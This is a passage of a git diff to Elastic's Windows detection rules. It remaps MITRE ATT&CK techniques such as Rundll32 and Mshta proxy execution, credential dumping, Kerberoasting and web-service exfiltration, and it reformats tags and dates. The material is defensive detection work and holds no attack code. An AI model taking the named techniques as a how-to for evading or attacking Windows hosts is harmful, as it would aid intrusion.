Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml index a09a3c65442..c728a7ba058 100644 --- a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml +++ b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/11" [rule] author = ["Elastic"] @@ -103,21 +103,41 @@ sequence by process.parent.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1127" -name = "Trusted Developer Utilities Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1127/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" [[rule.threat.technique.subtechnique]] -id = "T1127.001" -name = "MSBuild" -reference = "https://attack.mitre.org/techniques/T1127/001/" +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1216" +name = "System Script Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1216/" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" [[rule.threat.technique.subtechnique]] id = "T1218.004" @@ -144,6 +164,7 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" + [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" @@ -153,36 +174,15 @@ reference = "https://attack.mitre.org/techniques/T1220/" id = "T1497" name = "Virtualization/Sandbox Evasion" reference = "https://attack.mitre.org/techniques/T1497/" - [[rule.threat.technique.subtechnique]] id = "T1497.003" name = "Time Based Checks" reference = "https://attack.mitre.org/techniques/T1497/003/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_downloaded_shortcut_files.toml b/rules/windows/execution_downloaded_shortcut_files.toml index 9adeb9ceb50..d4347a8e04b 100644 --- a/rules/windows/execution_downloaded_shortcut_files.toml +++ b/rules/windows/execution_downloaded_shortcut_files.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -18,7 +18,14 @@ name = "Downloaded Shortcut Files" risk_score = 47 rule_id = "39157d52-4035-44a8-9d1a-6f8c5f580a07" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -63,18 +70,41 @@ Shortcut files (.lnk) are used in Windows environments to link to executable fil [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_downloaded_url_file.toml b/rules/windows/execution_downloaded_url_file.toml index c14b3d977e2..1e01769894a 100644 --- a/rules/windows/execution_downloaded_url_file.toml +++ b/rules/windows/execution_downloaded_url_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/11" [rule] author = ["Elastic"] @@ -18,7 +18,14 @@ name = "Downloaded URL Files" risk_score = 47 rule_id = "cd82e3d6-1346-4afd-8f22-38388bbf34cb" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" @@ -65,13 +72,36 @@ URL shortcut files, typically used for quick access to web resources, can be exp [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_enumeration_via_wmiprvse.toml b/rules/windows/execution_enumeration_via_wmiprvse.toml index cbb812845f3..15f89225424 100644 --- a/rules/windows/execution_enumeration_via_wmiprvse.toml +++ b/rules/windows/execution_enumeration_via_wmiprvse.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ Windows Management Instrumentation (WMI) is a powerful framework for managing da risk_score = 21 rule_id = "770e0c4d-b998-41e5-a62e-c7901fd7f470" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -86,51 +99,51 @@ process where host.os.type == "windows" and event.type == "start" and process.co [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" +[[rule.threat.technique.subtechnique]] +id = "T1016.001" +name = "Internet Connection Discovery" +reference = "https://attack.mitre.org/techniques/T1016/001/" + [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" -[[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" - [[rule.threat.technique]] id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_from_unusual_path_cmdline.toml b/rules/windows/execution_from_unusual_path_cmdline.toml index 82a8d3aa8d2..2b11f8ec924 100644 --- a/rules/windows/execution_from_unusual_path_cmdline.toml +++ b/rules/windows/execution_from_unusual_path_cmdline.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [transform] [[transform.osquery]] @@ -236,66 +236,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.003" -name = "CMSTP" -reference = "https://attack.mitre.org/techniques/T1218/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.004" -name = "InstallUtil" -reference = "https://attack.mitre.org/techniques/T1218/004/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.009" -name = "Regsvcs/Regasm" -reference = "https://attack.mitre.org/techniques/T1218/009/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml index 2a1c60b804f..62b894c0d72 100644 --- a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -113,7 +113,16 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 21 rule_id = "b29ee2be-bf99-446c-ab1a-2dc0183394b8" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", +] type = "eql" query = ''' @@ -131,36 +140,36 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_initial_access_foxmail_exploit.toml b/rules/windows/execution_initial_access_foxmail_exploit.toml index 9b47d891bbf..1724e0f677c 100644 --- a/rules/windows/execution_initial_access_foxmail_exploit.toml +++ b/rules/windows/execution_initial_access_foxmail_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/29" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -90,31 +90,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_initial_access_via_msc_file.toml b/rules/windows/execution_initial_access_via_msc_file.toml index 580c7458cb8..b0fc6db6048 100644 --- a/rules/windows/execution_initial_access_via_msc_file.toml +++ b/rules/windows/execution_initial_access_via_msc_file.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -50,7 +50,19 @@ references = ["https://www.genians.co.kr/blog/threat_intelligence/facebook"] risk_score = 73 rule_id = "e760c72b-bb1f-44f0-9f0d-37d51744ee75" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" @@ -88,36 +100,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.014" -name = "MMC" -reference = "https://attack.mitre.org/techniques/T1218/014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_initial_access_wps_dll_exploit.toml b/rules/windows/execution_initial_access_wps_dll_exploit.toml index d318934d34c..b6d8c918d59 100644 --- a/rules/windows/execution_initial_access_wps_dll_exploit.toml +++ b/rules/windows/execution_initial_access_wps_dll_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -57,7 +57,16 @@ references = [ risk_score = 73 rule_id = "ac6bc744-e82b-41ad-b58d-90654fa4ebfb" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,18 +88,26 @@ any where host.os.type == "windows" and process.name : "promecefpluginhost.exe" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1129" -name = "Shared Modules" -reference = "https://attack.mitre.org/techniques/T1129/" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_mofcomp.toml b/rules/windows/execution_mofcomp.toml index 1b244d6b497..a20ec6e9ab6 100644 --- a/rules/windows/execution_mofcomp.toml +++ b/rules/windows/execution_mofcomp.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/21" [rule] author = ["Elastic"] @@ -25,7 +25,18 @@ name = "Mofcomp Activity" risk_score = 21 rule_id = "210d4430-b371-470e-b879-80b7182aa75e" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,31 +90,31 @@ Mofcomp.exe is a tool used to compile Managed Object Format (MOF) files, which d [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/execution_ms_office_written_file.toml b/rules/windows/execution_ms_office_written_file.toml index 6f016f0f871..979a2d927a3 100644 --- a/rules/windows/execution_ms_office_written_file.toml +++ b/rules/windows/execution_ms_office_written_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/08/06" [rule] author = ["Elastic"] @@ -99,22 +99,30 @@ sequence with maxspan=2h [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_posh_hacktool_functions.toml b/rules/windows/execution_posh_hacktool_functions.toml index 25521e39cf8..8e6c5f0f7eb 100644 --- a/rules/windows/execution_posh_hacktool_functions.toml +++ b/rules/windows/execution_posh_hacktool_functions.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -102,7 +102,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Tactic: Discovery", "Tactic: Execution", "Tactic: Exfiltration", "Tactic: Lateral Movement", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -303,111 +310,22 @@ case_insensitive = true value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" - -[[rule.threat.technique]] -id = "T1558" -name = "Steal or Forge Kerberos Tickets" -reference = "https://attack.mitre.org/techniques/T1558/" - -[[rule.threat.technique.subtechnique]] -id = "T1558.003" -name = "Kerberoasting" -reference = "https://attack.mitre.org/techniques/T1558/003/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" - -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" - -[[rule.threat.technique.subtechnique]] -id = "T1087.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1087/002/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_posh_portable_executable.toml b/rules/windows/execution_posh_portable_executable.toml index a2bbc3e2a74..2053274cec8 100644 --- a/rules/windows/execution_posh_portable_executable.toml +++ b/rules/windows/execution_posh_portable_executable.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -118,34 +118,34 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" 